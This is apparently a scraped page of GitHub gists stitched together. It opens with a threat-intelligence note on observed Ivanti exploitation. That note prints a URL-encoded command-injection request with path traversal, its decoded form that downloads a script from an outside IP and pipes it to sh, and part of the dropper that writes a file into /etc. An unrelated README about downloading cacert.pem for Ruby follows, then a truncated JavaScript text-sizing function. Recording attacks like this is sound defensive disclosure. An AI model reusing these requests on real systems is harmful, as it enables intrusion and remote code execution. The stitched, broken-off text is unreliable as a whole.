Bob Aman sporkmonger

kimber99 / ivanti_jan2024.txt
Created January 22, 2024 17:40
Ivanti exploitation behavior 1/22
first stage: /api/v1/totp/user-backup-code/../../license/keys-status/%3b%77%67%65%74%20%2d%2d%74%69%6d%65%6f%75%74%3d%32%30%20%2d%2d%6e%6f%2d%63%68%65%63%6b%2d%63%65%72%74%69%66%69%63%61%74%65%20%2d%71%20%2d%4f%2d%20%68%74%74%70%73%3a%2f%2f%34%35%2e%31%33%30%2e%32%32%2e%32%31%39%2f%69%76%61%6e%74%69%2e%6a%73%7c%73%68%3b%0a
decodes to: /api/v1/totp/user-backup-code/../../license/keys-status/;wget --timeout=20 --no-check-certificate -q -O- https://45.130.22.219/ivanti.js|sh;
index of hosting on 45.130.22.219 says "Hacked by voadu"
scanned on URLScan.io Submission: On January 22 via manual (January 22nd 2024, 3:26:21 am UTC) from JP — Scanned from NL
ivanti.js:
#!/bin/bash
url='https://45.130.22.219/ivanti'
name1=`date +%s%N`
wget --no-check-certificate ${url} -O /etc/$name1
fnichol / README.md
Created March 12, 2011 20:52
Download a cacert.pem for RailsInstaller

Why?

There is a long-standing issue in Ruby where the net/http library by default does not check the validity of an SSL certificate during a TLS handshake. Rather than deal with the underlying problem (a missing certificate authority, a self-signed certificate, etc.) one tends to see bad hacks everywhere. This can lead to problems down the road.

From what I can see, the OpenSSL library that RailsInstaller delivers has no certificate authorities defined. So, let's go fetch some from the curl website. And since this is for Ruby, why don't we download and install the file with a Ruby script?

Installation

The Ruby Way! (Fun)

var setTextMeasure = function (contentElement, targetMeasure, maxSize, minSize) {
if (!contentElement) contentElement = document.createElement('p');
if (!targetMeasure) targetMeasure = 66;
if (!maxSize) maxSize = 16;
if (!minSize) minSize = 9;
var sizer = contentElement.cloneNode();
sizer.style.cssText = 'margin: 0; padding: 0; color: transparent; background-color: transparent; position: absolute;';